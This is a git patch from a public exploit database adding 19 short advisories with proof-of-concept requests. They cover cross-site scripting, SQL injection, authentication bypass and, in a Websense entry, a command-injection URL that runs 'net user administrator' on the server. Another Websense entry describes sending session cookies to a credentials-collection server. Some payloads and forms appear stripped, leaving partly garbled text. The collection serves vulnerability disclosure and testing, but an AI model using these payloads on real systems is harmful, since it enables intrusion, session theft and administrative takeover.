From b3e43674468f54a15b2476fe5df6a6540fdad29d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 21 Mar 2015 08:36:28 +0000 Subject: [PATCH] DB: 2015-03-21 19 new exploits --- files.csv | 19 ++++++ platforms/cgi/webapps/36457.txt | 18 ++++++ platforms/cgi/webapps/36458.txt | 7 ++ platforms/cgi/webapps/36459.txt | 14 ++++ platforms/multiple/remote/36455.txt | 99 +++++++++++++++++++++++++++++ platforms/php/webapps/36444.txt | 7 ++ platforms/php/webapps/36445.txt | 9 +++ platforms/php/webapps/36446.txt | 21 ++++++ platforms/php/webapps/36447.txt | 10 +++ platforms/php/webapps/36448.txt | 9 +++ platforms/php/webapps/36449.txt | 9 +++ platforms/php/webapps/36450.txt | 11 ++++ platforms/php/webapps/36451.txt | 9 +++ platforms/php/webapps/36452.txt | 9 +++ platforms/php/webapps/36453.txt | 19 ++++++ platforms/php/webapps/36454.txt | 17 +++++ platforms/php/webapps/36456.txt | 11 ++++ platforms/php/webapps/36460.txt | 9 +++ platforms/php/webapps/36461.txt | 9 +++ platforms/php/webapps/36462.txt | 7 ++ 20 files changed, 323 insertions(+) create mode 100755 platforms/cgi/webapps/36457.txt create mode 100755 platforms/cgi/webapps/36458.txt create mode 100755 platforms/cgi/webapps/36459.txt create mode 100755 platforms/multiple/remote/36455.txt create mode 100755 platforms/php/webapps/36444.txt create mode 100755 platforms/php/webapps/36445.txt create mode 100755 platforms/php/webapps/36446.txt create mode 100755 platforms/php/webapps/36447.txt create mode 100755 platforms/php/webapps/36448.txt create mode 100755 platforms/php/webapps/36449.txt create mode 100755 platforms/php/webapps/36450.txt create mode 100755 platforms/php/webapps/36451.txt create mode 100755 platforms/php/webapps/36452.txt create mode 100755 platforms/php/webapps/36453.txt create mode 100755 platforms/php/webapps/36454.txt create mode 100755 platforms/php/webapps/36456.txt create mode 100755 platforms/php/webapps/36460.txt create mode 100755 platforms/php/webapps/36461.txt create mode 100755 platforms/php/webapps/36462.txt diff --git a/files.csv b/files.csv index 2a8443574..47e4cc602 100755 --- a/files.csv +++ b/files.csv @@ -32863,3 +32863,22 @@ id,file,description,date,author,platform,type,port 36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080 36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443 36442,platforms/linux/webapps/36442.txt,"Citrix NITRO SDK - Command Injection Vulnerability",2015-03-19,"Han Sahin",linux,webapps,0 +36444,platforms/php/webapps/36444.txt,"WordPress flash-album-gallery Plugin 'flagshow.php' Cross Site Scripting Vulnerability",2011-12-13,Am!r,php,webapps,0 +36445,platforms/php/webapps/36445.txt,"WordPress The Welcomizer Plugin 1.3.9.4 'twiz-index.php' Cross Site Scripting Vulnerability",2011-12-31,Am!r,php,webapps,0 +36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 Multiple Cross Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0 +36447,platforms/php/webapps/36447.txt,"Pulse Pro 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-12-14,"Avram Marius",php,webapps,0 +36448,platforms/php/webapps/36448.txt,"BrowserCRM 5.100.1 modules/Documents/version_list.php parent_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +36449,platforms/php/webapps/36449.txt,"BrowserCRM 5.100.1 modules/Documents/index.php contact_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +36450,platforms/php/webapps/36450.txt,"BrowserCRM 5.100.1 Multiple Script URI XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +36451,platforms/php/webapps/36451.txt,"BrowserCRM 5.100.1 license/index.php framed Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +36452,platforms/php/webapps/36452.txt,"BrowserCRM 5.100.1 licence/view.php framed Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +36453,platforms/php/webapps/36453.txt,"BrowserCRM 5.100.1 pub/clients.php login[] Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +36454,platforms/php/webapps/36454.txt,"BrowserCRM 5.100.1 index.php login[] Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +36455,platforms/multiple/remote/36455.txt,"Nagios XI Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2011-12-14,anonymous,multiple,remote,0 +36456,platforms/php/webapps/36456.txt,"Owl Intranet Engine 1.00 'userid' Parameter Authentication Bypass Vulnerability",2011-12-15,"RedTeam Pentesting GmbH",php,webapps,0 +36457,platforms/cgi/webapps/36457.txt,"Websense 7.6 Triton Report Management Interface Cross Site Scripting Vulnerability",2011-12-15,"Ben Williams",cgi,webapps,0 +36458,platforms/cgi/webapps/36458.txt,"Websense 7.6 Triton 'ws_irpt.exe' Remote Command Execution Vulnerability",2011-12-15,"Ben Williams",cgi,webapps,0 +36459,platforms/cgi/webapps/36459.txt,"Websense 7.6 Products 'favorites.exe' Authentication Bypass Vulnerability",2011-12-15,"Ben Williams",cgi,webapps,0 +36460,platforms/php/webapps/36460.txt,"Flirt-Projekt 4.8 'rub' Parameter SQL Injection Vulnerability",2011-12-17,Lazmania61,php,webapps,0 +36461,platforms/php/webapps/36461.txt,"Social Network Community 2 'userID' Parameter SQL Injection Vulnerability",2011-12-17,Lazmania61,php,webapps,0 +36462,platforms/php/webapps/36462.txt,"Video Community Portal 'userID' Parameter SQL Injection Vulnerability",2011-12-18,Lazmania61,php,webapps,0 diff --git a/platforms/cgi/webapps/36457.txt b/platforms/cgi/webapps/36457.txt new file mode 100755 index 000000000..ef6e8b058 --- /dev/null +++ b/platforms/cgi/webapps/36457.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/51085/info + +Websense Triton is prone to a cross-site scripting vulnerability. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +This issue affects the following applications: + +Websense Web Security Gateway Anywhere v7.6 +Websense Web Security Gateway v7.6 +Websense Web Security v7.6 +Websense Web Filter v7.6 + +https://www.example.com/explorer_wse/detail.exe?c=cat&cat=153&anon=&startDate=2011-10-22&endDate=2011-10-22&session=a434cf98f3a402478599a71495a4a71e&dTitle=Internet_use_by_Category">§ion=1&uid=&col=1&cor=1&explorer=1&fork=1&puid=7360 + +Send the current session-cookies to a credentials-collection server: + +https://www.example.com/explorer_wse/detail.exe?c=cat&cat=153&anon=&startDate=2011-10-22&endDate=2011-10-22&session=a434cf98f3a402478599a71495a4a71e&dTitle=Internet_use_by_Category">§ion=1&uid=&col=1&cor=1&explorer=1&fork=1&puid=7360 diff --git a/platforms/cgi/webapps/36458.txt b/platforms/cgi/webapps/36458.txt new file mode 100755 index 000000000..6e89a44b4 --- /dev/null +++ b/platforms/cgi/webapps/36458.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/51086/info + +Websense Triton is prone to a remote command-execution vulnerability. + +An attacker can exploit this issue to execute arbitrary commands with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. + +https://www.example.com/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user administrator blah| \ No newline at end of file diff --git a/platforms/cgi/webapps/36459.txt b/platforms/cgi/webapps/36459.txt new file mode 100755 index 000000000..1df906fc2 --- /dev/null +++ b/platforms/cgi/webapps/36459.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/51087/info + +Multiple Websense products are prone to an authentication-bypass vulnerability. + +Remote attackers can exploit this issue to bypass the authentication mechanism and gain unauthorized access. + +The following Websense products are affected: + +Websense Web Security Gateway Anywhere 7.6 +Websense Web Security Gateway 7.6 +Websense Web Security 7.6 +Websense Web Filter 7.6 + +https://www.example.com/explorer_wse/favorites.exe?startDate=2011-10-22&endDate=2011-10-23&action=def \ No newline at end of file diff --git a/platforms/multiple/remote/36455.txt b/platforms/multiple/remote/36455.txt new file mode 100755 index 000000000..cbd59eb99 --- /dev/null +++ b/platforms/multiple/remote/36455.txt @@ -0,0 +1,99 @@ +source: www.securityfocus.com/bid/51069/info + +Nagios XI is prone to an HTML injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. + +Nagios XI versions prior to 2011R1.9 are vulnerable. + +Reflected XSS +----- + +Page: /nagiosxi/login.php +Variables: - +PoCs: http://site/nagiosxi/login.php/";alert('0a29');" +Details: The URL is copied into JavaScript variable 'backend_url' in an unsafe + manner + Also affects: + /nagiosxi/about/index.php + /nagiosxi/about/index.php + /nagiosxi/about/main.php + /nagiosxi/account/main.php + /nagiosxi/account/notifymethods.php + /nagiosxi/account/notifymsgs.php + /nagiosxi/account/notifyprefs.php + /nagiosxi/account/testnotification.php + /nagiosxi/help/index.php + /nagiosxi/help/main.php + /nagiosxi/includes/components/alertstream/go.php + /nagiosxi/includes/components/alertstream/index.php + /nagiosxi/includes/components/hypermap_replay/index.php + /nagiosxi/includes/components/massacknowledge/mass_ack.php + /nagiosxi/includes/components/xicore/recurringdowntime.php/ + /nagiosxi/includes/components/xicore/status.php + /nagiosxi/includes/components/xicore/tac.php + /nagiosxi/reports/alertheatmap.php + /nagiosxi/reports/availability.php + /nagiosxi/reports/eventlog.php + /nagiosxi/reports/histogram.php + /nagiosxi/reports/index.php + /nagiosxi/reports/myreports.php + /nagiosxi/reports/nagioscorereports.php + /nagiosxi/reports/notifications.php + /nagiosxi/reports/statehistory.php + /nagiosxi/reports/topalertproducers.php + /nagiosxi/views/index.php + /nagiosxi/views/main.php + +Page: /nagiosxi/account/ +Variables: xiwindow +PoCs: http://site/nagiosxi/account/?xiwindow="> + +Page: /nagiosxi/includes/components/massacknowledge/mass_ack.php +Variables: - +PoCs: http://site/nagiosxi/includes/components/massacknowledge/mass_ack.php/'> + +Page: /nagiosxi/includes/components/xicore/status.php +Variables: hostgroup, style +PoCs: http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup='> + http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=all&style=> + +Page: /nagiosxi/includes/components/xicore/recurringdowntime.php +Variables: - +PoCs: http://site/nagiosxi/includes/components/xicore/recurringdowntime.php/';}}alert('0a29') + + +Page: /nagiosxi/reports/alertheatmap.php +Variables: height, host, service, width +PoCs: http://site/nagiosxi/reports/alertheatmap.php?height="> + http://site/nagiosxi/reports/alertheatmap.php?host="> + http://site/nagiosxi/reports/alertheatmap.php?service="> + http://site/nagiosxi/reports/alertheatmap.php?width="> + +Page: /nagiosxi/reports/histogram.php +Variable: service +PoCs: http://site/nagiosxi/reports/histogram.php?service="> + +Page: /nagiosxi/reports/notifications.php +Variables: host, service +PoCs: http://site/nagiosxi/reports/notifications.php?host="> + http://site/nagiosxi/reports/notifications.php?service="> + +Page: /nagiosxi/reports/statehistory.php +Variables: host, service +PoCs: http://site/nagiosxi/reports/statehistory.php?host="> + http://site/nagiosxi/reports/statehistory.php?service="> + + +Stored XSS +----- + +Page: /nagiosxi/reports/myreports.php +Variable: title +Details: It is possible to store XSS within 'My Reports', however it +is believed this + is only viewable by the logged-in user. + 1) View a report and save it, e.g. + http://site/nagiosxi/reports/myreports.php?add=1&title=Availability+Summary&url=%2Fnagiosxi%2Freports%2Favailability.php&meta_s=a%3A0%3A%7B%7D + 2) Name the report with XSS, e.g. "> + diff --git a/platforms/php/webapps/36444.txt b/platforms/php/webapps/36444.txt new file mode 100755 index 000000000..a74983125 --- /dev/null +++ b/platforms/php/webapps/36444.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/51031/info + +flash-album-gallery plug-in for WordPress is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/[path]/wp-content/plugins/flash-album-gallery/flagshow.php?pid=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36445.txt b/platforms/php/webapps/36445.txt new file mode 100755 index 000000000..61f0566d2 --- /dev/null +++ b/platforms/php/webapps/36445.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51037/info + +The Welcomizer plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +The Welcomizer 1.3.9.4 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/wp-content/plugins/the-welcomizer/twiz-index.php?page=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36446.txt b/platforms/php/webapps/36446.txt new file mode 100755 index 000000000..c083e0d87 --- /dev/null +++ b/platforms/php/webapps/36446.txt @@ -0,0 +1,21 @@ +source: http://www.securityfocus.com/bid/51045/info + +Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Fork CMS 3.1.5 is vulnerable; other versions may also be affected. + +http://www.example.com/blog/detail/article?utm_source=feed&utm_medium=rss"> + +http://www.example.com/search?form=search&q_widget=&submit="> + +http://www.example.com/search?form=search&q_widget="> + +http://www.example.com/search?form="> + +http://www.example.com/private/en/users/edit?id=1"> + +http://www.example.com/private/en/pages/edit?token=true&id=1"> + +http://www.example.com/private/en/mailmotor/settings?token="> diff --git a/platforms/php/webapps/36447.txt b/platforms/php/webapps/36447.txt new file mode 100755 index 000000000..7f5a4aaec --- /dev/null +++ b/platforms/php/webapps/36447.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/51056/info + +Pulse Pro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Pulse Pro 1.7.2 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?p=blocks&d="> +http://www.example.com/index.php?p=edit-post&post_id="> \ No newline at end of file diff --git a/platforms/php/webapps/36448.txt b/platforms/php/webapps/36448.txt new file mode 100755 index 000000000..78f3e2f56 --- /dev/null +++ b/platforms/php/webapps/36448.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51060/info + +Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Browser CRM 5.100.01 is vulnerable; prior versions may also be affected. + +http://www.example.com/modules/Documents/version_list.php?parent_id=1%20AND%201=2%20--%202 \ No newline at end of file diff --git a/platforms/php/webapps/36449.txt b/platforms/php/webapps/36449.txt new file mode 100755 index 000000000..01dd5f58b --- /dev/null +++ b/platforms/php/webapps/36449.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51060/info + +Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Browser CRM 5.100.01 is vulnerable; prior versions may also be affected. + +http://www.example.com/modules/Documents/index.php?id=1&contact_id=1%27%20OR%20%271%27=%271 \ No newline at end of file diff --git a/platforms/php/webapps/36450.txt b/platforms/php/webapps/36450.txt new file mode 100755 index 000000000..dd6771abd --- /dev/null +++ b/platforms/php/webapps/36450.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/51060/info + +Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Browser CRM 5.100.01 is vulnerable; prior versions may also be affected. + +http://www.example.com/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E +http://www.example.com/modules/admin/admin_module_index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E +http://www.example.com/modules/calendar/customise_calendar_times.php/%22%3E%3Cscript%3Ealert%28document.cooki e%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/36451.txt b/platforms/php/webapps/36451.txt new file mode 100755 index 000000000..2e4d39a72 --- /dev/null +++ b/platforms/php/webapps/36451.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51060/info + +Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Browser CRM 5.100.01 is vulnerable; prior versions may also be affected. + +http://www.example.com/licence/index.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/36452.txt b/platforms/php/webapps/36452.txt new file mode 100755 index 000000000..0b4dba146 --- /dev/null +++ b/platforms/php/webapps/36452.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51060/info + +Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Browser CRM 5.100.01 is vulnerable; prior versions may also be affected. + +http://www.example.com/licence/view.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/36453.txt b/platforms/php/webapps/36453.txt new file mode 100755 index 000000000..21f4a644d --- /dev/null +++ b/platforms/php/webapps/36453.txt @@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/51060/info + +Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Browser CRM 5.100.01 is vulnerable; prior versions may also be affected. + +
+ +'> +'> +'> +'> +'> +'> +'> + +
diff --git a/platforms/php/webapps/36454.txt b/platforms/php/webapps/36454.txt new file mode 100755 index 000000000..3bfde9c00 --- /dev/null +++ b/platforms/php/webapps/36454.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/51060/info + +Browser CRM is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Browser CRM 5.100.01 is vulnerable; prior versions may also be affected. + +
+'> +'> +'> +'> +'> +'> + +
diff --git a/platforms/php/webapps/36456.txt b/platforms/php/webapps/36456.txt new file mode 100755 index 000000000..88c99602b --- /dev/null +++ b/platforms/php/webapps/36456.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/51076/info + +Owl Intranet Engine is prone to an authentication-bypass vulnerability. + +An attacker can exploit this issue to bypass the authentication process and gain administrative access to the application. + +Owl Intranet Engine 1.00 is affected; other versions may also be vulnerable. + +http://www.example.org/owl/admin/index.php?userid=1 +http://www.example.org/owl/admin/index.php?userid=1&newuser +http://www.example.org/owl/admin/index.php?userid=1&action=edituser&owluser=1 \ No newline at end of file diff --git a/platforms/php/webapps/36460.txt b/platforms/php/webapps/36460.txt new file mode 100755 index 000000000..77f8a4ab7 --- /dev/null +++ b/platforms/php/webapps/36460.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51106/info + +Flirt-Projekt is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Flirt-Projekt 4.8 is vulnerable; other versions may also be affected. + +http://www.example.com/flirtportal/rub2_w.php?kontaktid=f6389d0eeabdb4aaf99f3c3c949dc793&rub=1â??a \ No newline at end of file diff --git a/platforms/php/webapps/36461.txt b/platforms/php/webapps/36461.txt new file mode 100755 index 000000000..e1b098c14 --- /dev/null +++ b/platforms/php/webapps/36461.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51107/info + +Social Network Community is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Social Network Community 2 is vulnerable; other versions may also be affected. + +http://www.example.com/social2/user.php?userId=12'a \ No newline at end of file diff --git a/platforms/php/webapps/36462.txt b/platforms/php/webapps/36462.txt new file mode 100755 index 000000000..1518d7587 --- /dev/null +++ b/platforms/php/webapps/36462.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/51108/info + +Video Community Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/videoportalneu/index.php?d=user&id=2â??a \ No newline at end of file